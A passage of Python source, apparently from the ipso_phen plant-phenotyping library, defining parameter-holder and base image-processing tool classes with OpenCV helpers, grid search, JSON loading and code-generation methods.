)\r\n\r\n def add_exposure_viewer_switch(self):\r\n self.add_checkbox(\r\n name=\"show_over_under\",\r\n desc=\"Show over an under exposed parts\",\r\n default_value=0,\r\n )\r\n\r\n def add_button(\r\n self, name: str, desc: str, index: int = 0, hint: str = \"\"\r\n ) -> IptParam:\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=index,\r\n allowed_values=\"input_button\",\r\n hint=hint,\r\n )\r\n param.kind = \"button\"\r\n self.add(param)\r\n\r\n def add_spin_box(\r\n self,\r\n name: str,\r\n desc: str,\r\n default_value: int = 0,\r\n minimum: int = 0,\r\n maximum: int = 100,\r\n hint: str = \"\",\r\n ):\r\n param = IptParam(\r\n name=name,\r\n desc=desc,\r\n default_value=default_value,\r\n allowed_values=(minimum, maximum),\r\n hint=hint,\r\n )\r\n param.widget_type = \"spin_box\"\r\n self.add(param)\r\n\r\n def add_date_picker(\r\n self, name: str, desc: str, default_value: int = 0, hint: str = \"\"\r\n ):\r\n pass\r\n\r\n def reset_grid_search(self):\r\n for p in self._param_list:\r\n p.grid_search_options = str(p.default_value)\r\n gsw = p.gs_input\r\n if gsw is not None:\r\n self.update_ui(\r\n callback=\"set_text\", widget=gsw, text=p.grid_search_options\r\n )\r\n\r\n def update_grid_search(self, ignore_composite: bool = True) -> None:\r\n for p in self._param_list:\r\n values = p.grid_search_options\r\n if ignore_composite and (\r\n (\";\" in values) or (\"|\" in values) or (\",\" in values)\r\n ):\r\n continue\r\n p.grid_search_options = str(p.value)\r\n gsw = p.gs_input\r\n if gsw is not None:\r\n self.update_ui(\r\n callback=\"set_text\", widget=gsw, text=p.grid_search_options\r\n )\r\n\r\n def reset_input(self) -> None:\r\n for p in self._param_list:\r\n if p.is_input:\r\n p.value = p.default_value\r\n\r\n def reset_output(self) -> None:\r\n for p in self._param_list:\r\n if p.is_output:\r\n p.value = p.default_value\r\n\r\n def find_by_name(self, name) -> IptParam:\r\n for p in self._param_list:\r\n if p.name == name:\r\n return p\r\n return None\r\n\r\n def get_value_of(self, key, default_value=None, scale_factor=1) -> str:\r\n if (self._kwargs is not None) and (key in self._kwargs):\r\n res = self._kwargs.get(key, None)\r\n if res is not None:\r\n return res\r\n p = self.find_by_name(key)\r\n res = p.value if p is not None else default_value\r\n if type(res) is int or (\r\n (type(res) is str) and (res in (\"-\", \"+\") and res[1:].isdigit())\r\n ):\r\n return round(int(res) * scale_factor) if scale_factor != 1 else int(res)\r\n else:\r\n return res\r\n\r\n def has_param(self, key: str) -> bool:\r\n d = {} if self._kwargs is None else dict(self._kwargs)\r\n d.update(self.params_to_dict())\r\n return key in d.keys()\r\n\r\n def has_key_matching(self, partial: str) -> bool:\r\n d = {} if self._kwargs is None else dict(self._kwargs)\r\n d.update(self.params_to_dict())\r\n for k in d.keys():\r\n if partial in k:\r\n return True\r\n return False\r\n\r\n def has_keys(self, keys) -> int:\r\n res = 0\r\n for key in keys:\r\n if self.has_param(key):\r\n res += 1\r\n return res\r\n\r\n def set_value_of(self, key, value, update_widgets: bool = False):\r\n p = self.find_by_name(key)\r\n if p is not None:\r\n if value is not None:\r\n p.value = value\r\n else:\r\n p.value = p.default_value\r\n if update_widgets:\r\n p.update_label()\r\n p.update_input()\r\n p.update_output()\r\n\r\n def set_or_add_value(self, key, value):\r\n p = self.find_by_name(key)\r\n if p is None:\r\n self.add(\r\n IptParam(name=key, desc=\"\", default_value=value, allowed_values=None)\r\n )\r\n else:\r\n if value is not None:\r\n p.value = value\r\n else:\r\n p.value = p.default_value\r\n\r\n def set_or_add_param(self, src_param, allow_add):\r\n if src_param is None:\r\n return False\r\n p = self.find_by_name(src_param.name)\r\n if (p is None) and not allow_add:\r\n return False\r\n elif p is not None:\r\n self._param_list.remove(p)\r\n self.add(src_param.copy())\r\n\r\n def get(self, key, value, default=None):\r\n p = self.find_by_name(key)\r\n if p is not None:\r\n return getattr(p, value)\r\n else:\r\n return default\r\n\r\n def update_output_from_dict(self, data: dict):\r\n self.reset_output()\r\n for p in self._param_list:\r\n val = data.get(p.name, None)\r\n if val is not None:\r\n p.update_output(output_value=str(val))\r\n\r\n def input_params(\r\n self,\r\n exclude_defaults: bool = False,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return [\r\n p\r\n for p in self.gizmos\r\n if (\r\n p.is_input\r\n and not (exclude_defaults and p.is_default)\r\n and (p.name not in excluded_params)\r\n )\r\n or (p.name in forced_params)\r\n ]\r\n\r\n def output_params(\r\n self,\r\n exclude_defaults: bool = False,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return [\r\n p\r\n for p in self.gizmos\r\n if (\r\n p.is_output\r\n and not (exclude_defaults and p.is_default)\r\n and (p.name not in excluded_params)\r\n )\r\n or (p.name in forced_params)\r\n ]\r\n\r\n def all_params(\r\n self,\r\n exclude_defaults: bool = False,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return [\r\n p\r\n for p in self.gizmos\r\n if (\r\n not (exclude_defaults and p.is_default)\r\n and (p.name not in excluded_params)\r\n )\r\n or (p.name in forced_params)\r\n ]\r\n\r\n def params_to_dict(\r\n self,\r\n include_input: bool = True,\r\n include_output: bool = False,\r\n include_neutral: bool = False,\r\n ):\r\n dic = {}\r\n for p in self.gizmos:\r\n if (\r\n (include_input and p.is_input)\r\n or (include_output and p.is_output)\r\n or (include_neutral and p.is_neutral)\r\n ):\r\n dic[p.name] = p.value\r\n return dic\r\n\r\n def update_inputs(self, wrapper, update_values: dict = {}):\r\n param_names_list = [p.kind for p in self.gizmos]\r\n update_values = {}\r\n if \"channel_selector\" in param_names_list and wrapper is not None:\r\n update_values[\"channels\"] = {\r\n k: n for k, n in wrapper.file_handler.available_channels.items()\r\n }\r\n if \"hint_channels_select\" in param_names_list and wrapper is not None:\r\n channels = \",\".join(\r\n [k for k in wrapper.file_handler.available_channels.keys]\r\n )\r\n update_values[\"hint\"] = f\"Available channels: {channels}\"\r\n\r\n channels = update_values.get(\"channels\", None)\r\n ipt_list = update_values.get(\"ipt_list\", None)\r\n hint = update_values.get(\"hint\", None)\r\n for p in self._param_list:\r\n if (p.kind == \"channel_selector\") and (channels is not None):\r\n p.update_input(new_values=channels)\r\n elif (p.kind == \"hint_channels_select\") and (hint is not None):\r\n p.hint = hint\r\n\r\n @property\r\n def gizmos(self):\r\n return self._param_list\r\n\r\n @property\r\n def has_input(self):\r\n for p in self._param_list:\r\n if p.is_input:\r\n return True\r\n return False\r\n\r\n @property\r\n def has_output(self):\r\n for p in self._param_list:\r\n if p.is_output:\r\n return True\r\n return False\r\n\r\n\r\nclass IptBase(IptParamHolder, ABC):\r\n def __init__(self, wrapper=None, **kwargs):\r\n super(IptBase, self).__init__(**kwargs)\r\n\r\n self._wrapper = wrapper\r\n self._result = None\r\n self.result = None\r\n self.demo_image = None\r\n self._old_lock_state = False\r\n\r\n self.output_path = \"\"\r\n\r\n def __repr__(self):\r\n return (\r\n f\"{type(self).__name__}(\"\r\n + f\",\".join([f\"{p.name}={p.str_value}\" for p in self.gizmos])\r\n + \")\"\r\n )\r\n\r\n def __str__(self):\r\n return f\"{type(self).__name__}_\" + self.input_params_as_str(\r\n exclude_defaults=True,\r\n excluded_params=(\"progress_callback\",),\r\n forced_params=(\"channel\",),\r\n )\r\n\r\n def __enter__(self):\r\n wrapper = self.wrapper\r\n if wrapper is not None:\r\n self._old_lock_state = wrapper.lock\r\n wrapper.lock = True\r\n return self.process_wrapper(), self\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.wrapper.lock = self._old_lock_state\r\n\r\n def short_desc(self):\r\n res = f\"{type(self).__name__}_\"\r\n gizmos_info = {}\r\n for p in self.gizmos:\r\n if p.kind not in gizmos_info.keys():\r\n gizmos_info[p.kind] = str(p)\r\n if \"channel_selector\" in gizmos_info.keys():\r\n res += str(gizmos_info[\"channel_selector\"])\r\n elif \"roi_name_selector\" in gizmos_info.keys():\r\n res += str(gizmos_info[\"roi_name_selector\"])\r\n elif \"color_space_selector\" in gizmos_info.keys():\r\n res += str(gizmos_info[\"color_space_selector\"])\r\n return res\r\n\r\n def copy(self, copy_wrapper: bool = True, updates={}):\r\n if copy_wrapper:\r\n return self.__class__(wrapper=self.wrapper, **self.params_to_dict())\r\n else:\r\n return self.__class__(**self.params_to_dict())\r\n\r\n def to_json(self):\r\n return {\r\n \"name\": self.name,\r\n \"package\": self.package,\r\n CLASS_NAME_KEY: type(self).__name__,\r\n MODULE_NAME_KEY: type(self).__module__,\r\n PARAMS_NAME_KEY: self.params_to_dict(),\r\n GRID_SEARCH_PARAMS_NAME_KEY: {\r\n p.name: p.grid_search_options for p in self.gizmos\r\n },\r\n }\r\n\r\n @classmethod\r\n def from_json(cls, json_data: dict):\r\n class_name = json_data[CLASS_NAME_KEY]\r\n module_name: str = json_data[MODULE_NAME_KEY].replace(\"ip_tools\", \"ipt\")\r\n if \"ipt\" in module_name and \"ipapi\" not in module_name:\r\n module_name = module_name.replace(\"ipt\", \"ipso_phen.ipapi.ipt\", 1)\r\n if \"ipapi\" in module_name and \"ipso_phen\" not in module_name:\r\n module_name = module_name.replace(\"ipapi\", \"ipso_phen.ipapi\", 1)\r\n __import__(module_name)\r\n for _, obj in inspect.getmembers(sys.modules[module_name]):\r\n if inspect.isclass(obj) and (obj.__name__ == class_name):\r\n try:\r\n ipt = obj(**json_data[PARAMS_NAME_KEY])\r\n break\r\n except Exception as e:\r\n return e\r\n else:\r\n ipt = None\r\n if ipt is None:\r\n return None\r\n ipt._param_list = [p for p in ipt._param_list if p.allowed_values is not None]\r\n gs_params = json_data.get(GRID_SEARCH_PARAMS_NAME_KEY, None)\r\n if gs_params:\r\n for p in ipt.gizmos:\r\n gp = gs_params.get(p.name, None)\r\n if gp:\r\n p.grid_search_options = gp\r\n return ipt\r\n\r\n def execute(self, param, **kwargs):\r\n pass\r\n\r\n def init_wrapper(self, **kwargs) -> BaseImageProcessor:\r\n \"\"\"Initializes wrapper according to key arguments\r\n\r\n Returns:\r\n BaseImageProcessor -- Wrapper\r\n \"\"\"\r\n self._kwargs = kwargs\r\n wrapper = self._get_wrapper()\r\n self.demo_image = None\r\n if kwargs.get(\"reset_wrapper\", True) is True:\r\n wrapper.reset()\r\n return wrapper\r\n\r\n def process_grid_search(self, **kwargs):\r\n progress_callback = kwargs.get(\"progress_callback\", None)\r\n random_grid_search = kwargs.get(\"random_grid_search\", False)\r\n\r\n def lcl_callback(step, total, msg, image_dict={}):\r\n if progress_callback is not None:\r\n return progress_callback(step, total, msg, image_dict)\r\n else:\r\n print(msg)\r\n return True\r\n\r\n tmp_wrapper = kwargs.get(\"wrapper\", None)\r\n if tmp_wrapper is not None:\r\n self.wrapper = tmp_wrapper\r\n elif self.wrapper is None:\r\n self._kwargs = kwargs\r\n self._wrapper = self._get_wrapper()\r\n self._wrapper.reset()\r\n self._kwargs = None\r\n\r\n if self.wrapper is None:\r\n return False\r\n\r\n procs = list(\r\n itertools.product(*[p.decode_grid_search_options() for p in self.gizmos])\r\n )\r\n if random_grid_search:\r\n random.shuffle(procs)\r\n tot_ = len(procs)\r\n keys = [p.name for p in self.gizmos]\r\n lcl_callback(0, tot_, f\"_____________________________________\")\r\n lcl_callback(0, tot_, f\"Instantiated tools\")\r\n for i, p in enumerate(procs):\r\n kwargs_ = {k: (int(v) if str.isdigit(v) else v) for k, v in zip(keys, p)}\r\n kwargs_[\"progress_callback\"] = progress_callback\r\n ip = self.__class__(**kwargs_)\r\n self.wrapper.image_list = []\r\n kwargs_[\"wrapper\"] = self.wrapper\r\n kwargs_[\"reset_wrapper\"] = False\r\n if ip.process_wrapper(**kwargs_):\r\n img_lst_ = ip.wrapper.image_list\r\n if len(img_lst_) > 0:\r\n if kwargs.get(\"send_all_images\", False):\r\n for dic in ip.wrapper.image_list:\r\n go_on = lcl_callback(\r\n i + 1,\r\n tot_,\r\n f\"\"\"{ip.name}:\r\n {ip.input_params_as_str(exclude_defaults=True,\r\n excluded_params=(\"progress_callback\",))}\"\"\",\r\n dic,\r\n )\r\n if go_on is False:\r\n return\r\n else:\r\n dic = ip.wrapper.retrieve_image_dict(\"mosaic_out\")\r\n if dic is None:\r\n dic = ip.wrapper.retrieve_image_dict(\"mosaic\")\r\n if dic is None:\r\n dic = img_lst_[len(img_lst_) - 1]\r\n go_on = lcl_callback(\r\n i + 1,\r\n tot_,\r\n f\"\"\"{ip.name}:\r\n {ip.input_params_as_str(exclude_defaults=True, \r\n excluded_params=(\"progress_callback\",))}\"\"\",\r\n dic,\r\n )\r\n if go_on is False:\r\n return\r\n else:\r\n go_on = lcl_callback(i + 1, tot_, f\"Failed {str(ip)}\")\r\n if not go_on:\r\n return\r\n\r\n def do_channel_failure(self, channel):\r\n self.wrapper.store_image(\r\n self.wrapper.current_image, f\"Missing {channel} channel\", text_overlay=True\r\n )\r\n logger.error(f\"Missing {channel} channel\")\r\n\r\n def _get_wrapper(self):\r\n if \"wrapper\" in self.kwargs:\r\n value = self.kwargs.get(\"wrapper\", None)\r\n if isinstance(value, str):\r\n self.wrapper = BaseImageProcessor(value)\r\n else:\r\n self._wrapper = value\r\n return self._wrapper\r\n\r\n def get_mask(self):\r\n mask = self.wrapper.mask\r\n if mask is None:\r\n img = self.wrapper.current_image\r\n if np.sum(img[img != 255]) == 0:\r\n mask = self.wrapper.get_channel(src_img=img, channel=\"bl\")\r\n return mask\r\n\r\n def to_uint8(self, img, normalize: bool = False):\r\n if str(img.dtype) == \"bool\":\r\n img = img.astype(np.uint8)\r\n img[img != 0] = 255\r\n return img\r\n elif (\r\n (str(img.dtype) == \"float64\")\r\n or (str(img.dtype) == \"float16\")\r\n or (str(img.dtype) == \"int32\")\r\n ):\r\n return ((img - img.min()) / (img.max() - img.min()) * 255).astype(np.uint8)\r\n elif str(img.dtype) == \"uint8\":\r\n if normalize:\r\n if len(img.shape) == 2:\r\n return ((img - img.min()) / (img.max() - img.min()) * 255).astype(\r\n np.uint8\r\n )\r\n else:\r\n c1, c2, c3 = cv2.split(img)\r\n c1, c2, c3 = (\r\n cv2.equalizeHist(c1),\r\n cv2.equalizeHist(c2),\r\n cv2.equalizeHist(c3),\r\n )\r\n return np.dstack((c1, c2, c3))\r\n else:\r\n return img.copy()\r\n else:\r\n logger.error(f\"Unknown source format {str(img.type)}\")\r\n\r\n def to_fuzzy(self, img):\r\n \"\"\"\r\n Converts image to float numbers constrained between 0 & 1\r\n :param img:\r\n :return: image\r\n \"\"\"\r\n if str(img.dtype) == \"bool\":\r\n img = img.astype(np.uint8)\r\n return img\r\n elif (\r\n (str(img.dtype) == \"float64\")\r\n or (str(img.dtype) == \"int32\")\r\n or (str(img.dtype) == \"uint8\")\r\n ):\r\n return ((img - img.min()) / (img.max() - img.min()) * 1).astype(float)\r\n else:\r\n logger.error(f\"Unknown source format {str(img.type)}\")\r\n\r\n def to_bit(self, img, threshold=255):\r\n \"\"\"\r\n Converts image data to either 0 or 1, be careful with what you wish for\r\n :param img:\r\n :param threshold:\r\n :return: image\r\n \"\"\"\r\n if str(img.dtype) == \"bool\":\r\n img = img.astype(np.uint8)\r\n return img\r\n elif str(img.dtype) == \"uint8\":\r\n img[img < threshold] = 0\r\n img[img >= threshold] = 1\r\n return img\r\n elif (str(img.dtype) == \"float64\") or (str(img.dtype) == \"int32\"):\r\n return ((img - img.min()) / (img.max() - img.min()) * 1).astype(np.uint8)\r\n else:\r\n logger.error(f\"Unknown source format {str(img.type)}\")\r\n\r\n @staticmethod\r\n def apply_mask(image, mask):\r\n return cv2.bitwise_and(image, image, mask=mask)\r\n\r\n def match_image_size_to_source(\r\n self,\r\n img,\r\n source_mode: str = \"source_file\",\r\n ignore_list: tuple = (),\r\n ):\r\n if not (source_mode in ignore_list):\r\n source_type = self.get_value_of(source_mode, \"source\")\r\n else:\r\n return img\r\n\r\n if source_type == \"process_roi\":\r\n self.wrapper.init_rois()\r\n return self.wrapper.crop_to_roi(img, type(self).__name__.lower())\r\n elif source_type == \"cropped_source\":\r\n self.wrapper.init_rois()\r\n return self.wrapper.crop_to_keep_roi(img=img)\r\n else:\r\n return img\r\n\r\n def get_ipt_roi(self, wrapper, roi_names: list = []) -> list:\r\n res = []\r\n for roi in wrapper.rois_list:\r\n if roi.name in roi_names:\r\n res.append(roi)\r\n return res\r\n\r\n def get_short_hash(\r\n self,\r\n exclude_list: tuple = (),\r\n add_plant_name: bool = True,\r\n ) -> Union[str, None]:\r\n wrapper = self.wrapper\r\n if wrapper is None:\r\n return None\r\n p_str = self.input_params_as_str(\r\n exclude_defaults=False, excluded_params=exclude_list\r\n ).encode(\"utf-8\")\r\n w_str = str(wrapper).encode(\"utf-8\")\r\n long_hash = hashlib.sha1(p_str + w_str)\r\n\r\n if add_plant_name:\r\n return (\r\n wrapper.plant\r\n + \"_\"\r\n + make_safe_name(\r\n str(base64.urlsafe_b64encode(long_hash.digest()[0:20]))\r\n ).replace(\"_\", \"\")\r\n )\r\n else:\r\n return make_safe_name(\r\n str(base64.urlsafe_b64encode(long_hash.digest()[0:20]))\r\n ).replace(\"_\", \"\")\r\n\r\n def hash_luid(self):\r\n return make_safe_name(\r\n str(\r\n base64.urlsafe_b64encode(\r\n hashlib.sha1(self.wrapper.luid.encode(\"utf-8\")).digest()[0:20]\r\n )\r\n )\r\n ).replace(\"_\", \"\")\r\n\r\n def get_channel(self, channel):\r\n median_filter_size = self.get_value_of(\"median_filter_size\")\r\n return self.wrapper.get_channel(\r\n src_img=self.wrapper.current_image,\r\n channel=channel,\r\n median_filter_size=(\r\n 0 if median_filter_size == 1 else ipc.ensure_odd(median_filter_size)\r\n ),\r\n )\r\n\r\n def apply_binary_threshold(self, wrapper, img, channel):\r\n min_ = self.get_value_of(\"min_t\")\r\n max_ = self.get_value_of(\"max_t\")\r\n median_filter_size = self.get_value_of(\"median_filter_size\")\r\n median_filter_size = (\r\n 0 if median_filter_size == 1 else ipc.ensure_odd(median_filter_size)\r\n )\r\n\r\n min_, max_ = min(min_, max_), max(min_, max_)\r\n\r\n mask, _ = wrapper.get_mask(\r\n src_img=img,\r\n channel=channel,\r\n min_t=min_,\r\n max_t=max_,\r\n median_filter_size=median_filter_size,\r\n )\r\n\r\n return self.apply_morphology_from_params(mask)\r\n\r\n def apply_morphology(\r\n self,\r\n mask,\r\n morph_op=\"none\",\r\n kernel_size=3,\r\n iter_count=1,\r\n kernel_shape=\"ellipsis\",\r\n ):\r\n if mask is None:\r\n return None\r\n\r\n if not (len(mask.shape) == 2 or (len(mask.shape) == 3 and mask.shape[2] == 1)):\r\n logger.error(\"Morphology works only on mask images\")\r\n return None\r\n\r\n if kernel_shape == \"rectangle\":\r\n k_shape = cv2.MORPH_RECT\r\n elif kernel_shape == \"cross\":\r\n k_shape = cv2.MORPH_CROSS\r\n else:\r\n k_shape = cv2.MORPH_ELLIPSE\r\n\r\n if kernel_size <= 1:\r\n return mask\r\n elif (kernel_size % 2 == 0) and (kernel_size > 0):\r\n kernel_size += 1\r\n\r\n func = getattr(self._wrapper, morph_op, None)\r\n if func:\r\n return func(\r\n mask,\r\n kernel_size=kernel_size,\r\n proc_times=iter_count,\r\n kernel_shape=k_shape,\r\n )\r\n else:\r\n return mask\r\n\r\n def apply_morphology_from_params(self, mask, store_result: bool = False):\r\n ret = self.apply_morphology(\r\n mask=mask,\r\n morph_op=self.get_value_of(\"morph_op\"),\r\n kernel_size=self.get_value_of(\"kernel_size\", 0),\r\n iter_count=self.get_value_of(\"proc_times\", 1),\r\n kernel_shape=self.get_value_of(\"kernel_shape\", None),\r\n )\r\n\r\n if ret is not None and store_result:\r\n self.wrapper.store_image(image=ret, text=\"morphology_applied\")\r\n\r\n return ret\r\n\r\n @staticmethod\r\n def get_labels_as_dict(\r\n watershed_image,\r\n labels,\r\n min_size=-1,\r\n ):\r\n res = []\r\n # loop over the unique labels returned by the Watershed\r\n # algorithm\r\n for label in np.unique(labels):\r\n # if the label is zero, we are examining the 'background'\r\n # so simply ignore it\r\n if label == 0:\r\n continue\r\n\r\n # otherwise, allocate memory for the label region and draw\r\n # it on the mask\r\n mask = np.zeros(watershed_image.shape[:2], dtype=\"uint8\")\r\n mask[labels == label] = 255\r\n\r\n # detect contours in the mask and grab the largest one\r\n contours_ = ipc.get_contours(\r\n mask=mask,\r\n retrieve_mode=cv2.RETR_EXTERNAL,\r\n method=cv2.CHAIN_APPROX_SIMPLE,\r\n )\r\n c = max(contours_, key=cv2.contourArea)\r\n\r\n # Draw min area rect enclosing object\r\n if cv2.contourArea(c) < min_size:\r\n continue\r\n x, y, w, h = cv2.boundingRect(c)\r\n res.append({\"id\": label, \"x\": x, \"y\": y, \"w\": w, \"h\": h})\r\n return res\r\n\r\n def compose_image_with_rois(self, fgd_img, bkg_img, rois=None):\r\n if rois is None:\r\n rois = self.get_ipt_roi(\r\n wrapper=self.wrapper,\r\n roi_names=self.get_value_of(\"roi_names\").replace(\" \", \"\").split(\",\"),\r\n )\r\n if len(rois) > 0:\r\n return regions.copy_rois(rois=rois, src=fgd_img, dst=bkg_img)\r\n else:\r\n return fgd_img\r\n\r\n def draw_rois_on_image(self, img, line_width=2, rois=None):\r\n if rois is None:\r\n rois = self.get_ipt_roi(\r\n wrapper=self.wrapper,\r\n roi_names=self.get_value_of(\"roi_names\").replace(\" \", \"\").split(\",\"),\r\n )\r\n ret = img.copy()\r\n if len(rois) > 0:\r\n for roi in rois:\r\n ret = roi.draw_to(ret, line_width=2)\r\n\r\n return ret\r\n\r\n def print_segmentation_labels(\r\n self,\r\n watershed_image,\r\n labels,\r\n dbg_suffix=\"\",\r\n min_size=-1,\r\n ):\r\n # loop over the unique labels returned by the Watershed\r\n # algorithm\r\n for label in np.unique(labels):\r\n # if the label is zero, we are examining the 'background'\r\n # so simply ignore it\r\n if label == 0:\r\n continue\r\n\r\n # otherwise, allocate memory for the label region and draw\r\n # it on the mask\r\n mask = np.zeros(watershed_image.shape[:2], dtype=\"uint8\")\r\n mask[labels == label] = 255\r\n\r\n # detect contours in the mask and grab the largest one\r\n contours_ = ipc.get_contours(\r\n mask=mask,\r\n retrieve_mode=cv2.RETR_EXTERNAL,\r\n method=cv2.CHAIN_APPROX_SIMPLE,\r\n )\r\n c = max(contours_, key=cv2.contourArea)\r\n\r\n # Draw min area rect enclosing object\r\n x, y, w, h = cv2.boundingRect(c)\r\n area_ = cv2.contourArea(c)\r\n is_area_enough = area_ > min_size\r\n draw_color = (255, 255, 255) if is_area_enough else (0, 0, 0)\r\n cv2.rectangle(watershed_image, (x, y), (x + w, y + h), draw_color, 4)\r\n cv2.drawContours(watershed_image, [c], 0, draw_color, 4)\r\n cv2.putText(\r\n watershed_image,\r\n f\"#{label}: {area_}\",\r\n (x - 10, y),\r\n cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.6,\r\n draw_color,\r\n 2,\r\n )\r\n\r\n self._wrapper.store_image(watershed_image, f\"{dbg_suffix}_vis_labels\")\r\n\r\n return watershed_image\r\n\r\n def help_stub(self):\r\n res = '\"\"\"\\n'\r\n res += f\"{self.name}:\\n\"\r\n res += self.description\r\n res += \"\\n\"\r\n res += f\"Real time: {str(self.real_time)}\\n\"\r\n res += \"\\n\"\r\n res += \"Keyword Arguments (in parentheses, argument name):\\n\"\r\n if self.has_input:\r\n for p in self.gizmos:\r\n if p.is_input:\r\n res += f\" * {p.desc} ({p.name}): {p.hint}\".rstrip() + \"\\n\"\r\n if self.has_input and self.has_output:\r\n res += \"--------------\\n\"\r\n if self.has_output:\r\n for p in self.gizmos:\r\n if p.is_output and not p.is_neutral:\r\n res += f\" * output ({p.name}): {p.desc}\".rstrip() + \"\\n\"\r\n res += '\"\"\"\\n'\r\n\r\n return res\r\n\r\n def input_params_as_str(\r\n self,\r\n exclude_defaults: bool = True,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return \", \".join(\r\n [\r\n f\"{p.name}={p.str_value}\"\r\n for p in self.input_params(\r\n exclude_defaults=exclude_defaults,\r\n excluded_params=excluded_params,\r\n forced_params=forced_params,\r\n )\r\n ]\r\n )\r\n\r\n def input_params_as_html(\r\n self,\r\n exclude_defaults: bool = True,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return (\r\n \"
    \"\r\n + \"\".join(\r\n f\"
  • {p.name}={p.str_value}
  • \"\r\n for p in self.input_params(\r\n exclude_defaults=exclude_defaults,\r\n excluded_params=excluded_params,\r\n forced_params=forced_params,\r\n )\r\n )\r\n + \"
\"\r\n )\r\n\r\n def code_imports(self, **kwargs):\r\n ret = [f\"from {self.__module__} import {type(self).__name__}\"]\r\n if kwargs.get(\"build_wrapper\", \"yes\") is not False:\r\n ret.append(\r\n \"from ipso_phen.ipapi.base.ip_abstract import BaseImageProcessor\"\r\n )\r\n return ret\r\n\r\n def code_apply_roi(self, print_result=None, white_spaces=\"\"):\r\n ws = \"\".join(\r\n [\r\n \" \"\r\n for _ in range(0, len(f\"{white_spaces}ipt_res = ipt.process_wrapper(\"))\r\n ]\r\n )\r\n params_ = f\",\\n{ws}\".join(\r\n [\r\n f\"{p.name}={p.str_value}\"\r\n for p in self.input_params(exclude_defaults=True)\r\n ]\r\n )\r\n code_ = f'{white_spaces}if wrapper is None:\\n{white_spaces} raise RuntimeError(\"Missing wrapper\")\\n'\r\n\r\n code_ += f\"{white_spaces}ipt = {type(self).__name__}({params_})\\n\"\r\n code_ += f'{white_spaces}if callable(getattr(ipt, \"apply_roy\")):\\n'\r\n add_ws = \" \"\r\n code_ += f\"{white_spaces}{add_ws}wrapper.current_image = ipt.apply_roy(wrapper=wrapper)\\n\"\r\n\r\n return code_\r\n\r\n def code_body(self, **kwargs):\r\n use_with_clause = kwargs.get(\"use_with_clause\", False)\r\n build_wrapper = kwargs.get(\"build_wrapper\", \"yes\")\r\n file_name = kwargs.get(\"file_name\", \"\")\r\n white_spaces = kwargs.get(\"white_spaces\", \"\")\r\n target_data_base = kwargs.get(\"target_data_base\", None)\r\n\r\n if file_name:\r\n wrapper_ = file_name\r\n else:\r\n wrapper_ = self.file_name\r\n\r\n wrapper_ = \"{file}\"\r\n if use_with_clause:\r\n ws = \"\".join(\r\n [\r\n \" \"\r\n for _ in range(0, len(f\"{white_spaces}with {type(self).__name__}(\"))\r\n ]\r\n )\r\n else:\r\n ws = \"\".join(\r\n [\r\n \" \"\r\n for _ in range(\r\n 0, len(f\"{white_spaces}ipt_res = ipt.process_wrapper(\")\r\n )\r\n ]\r\n )\r\n params_ = f\",\\n{ws}\".join(\r\n [\r\n f\"{p.name}={p.str_value}\"\r\n for p in self.input_params(exclude_defaults=True)\r\n ]\r\n )\r\n if use_with_clause or (build_wrapper is False):\r\n if build_wrapper is False:\r\n wrapper_param = wrapper_\r\n else:\r\n wrapper_param = \"wrapper\"\r\n if params_:\r\n params_ = f\",\\n{ws}\".join([f\"wrapper={wrapper_param}\", params_])\r\n else:\r\n params_ = f\"wrapper={wrapper_param}\"\r\n\r\n if (build_wrapper is True) or (build_wrapper == \"yes\"):\r\n code_ = f\"{white_spaces}wrapper = BaseImageProcessor({wrapper_})\\n\"\r\n if target_data_base:\r\n code_ += f\"{white_spaces}wrapper.target_database = target_data_base\\n\"\r\n code_ += f\"{white_spaces}wrapper.lock = True\\n\"\r\n elif build_wrapper == \"expected\":\r\n code_ = f'{white_spaces}if wrapper is None:\\n{white_spaces} raise RuntimeError(\"Missing wrapper\")\\n'\r\n else:\r\n code_ = \"\"\r\n\r\n if use_with_clause:\r\n code_ += (\r\n f\"{white_spaces}with {type(self).__name__}({params_}) as (res, ed):\\n\"\r\n )\r\n add_ws = \" \"\r\n code_ += f\"{white_spaces}{add_ws}if res:\\n\"\r\n code_ += f\"{white_spaces}{add_ws}{add_ws}return ed.result\\n\"\r\n code_ += f\"{white_spaces}{add_ws}else:\\n\"\r\n code_ += (\r\n f\"{white_spaces}{add_ws}{add_ws}\"\r\n + 'print(f\"Process error: {str(wrapper.error_holder)}\")\\n'\r\n )\r\n else:\r\n code_ += f\"{white_spaces}ipt = {type(self).__name__}()\\n\"\r\n if build_wrapper is not False:\r\n code_ += f\"{white_spaces}ipt.wrapper = wrapper\\n\"\r\n code_ += f\"{white_spaces}ipt_res = ipt.process_wrapper({params_})\\n\"\r\n if self.result_name and (self.result_name != \"none\"):\r\n code_ += f\"{white_spaces}{self.result_name} = ipt.result\\n\"\r\n code_ += f\"{white_spaces}if not ipt_res:\\n\"\r\n code_ += (\r\n f\"{white_spaces} \"\r\n + 'print(f\"Process error: {str(ipt.wrapper.error_holder)}\")\\n'\r\n )\r\n\r\n return code_\r\n\r\n def code(self, **kwargs):\r\n return (\r\n \"\\n\".join(self.code_imports(**kwargs)) + \"\\n\\n\\n\" + self.code_body(**kwargs)\r\n )\r\n\r\n def apply_test_values_overrides(self, use_cases: tuple = ()):\r\n pass\r\n\r\n @abstractproperty\r\n def name(self):\r\n return \"Base abstract image processing tool\"\r\n\r\n @property\r\n def description(self):\r\n return \"\\n\"\r\n\r\n @property\r\n def hint(self):\r\n if self.process_wrapper.__doc__ is not None:\r\n return inspect.getdoc(self.process_wrapper)\r\n else:\r\n return self.help_stub()\r\n\r\n @property\r\n def needs_doc_string(self):\r\n return self.process_wrapper.__doc__ is None\r\n\r\n @property\r\n def real_time(self):\r\n return False\r\n\r\n @property\r\n def wrapper(self) -> BaseImageProcessor:\r\n return self._wrapper\r\n\r\n @wrapper.setter\r\n def wrapper(self, value):\r\n self._wrapper = value\r\n\r\n @property\r\n def is_ready(self):\r\n return self._wrapper is not None\r\n\r\n @property\r\n def order(self):\r\n return 9999\r\n\r\n @property\r\n def output_kind(self):\r\n return 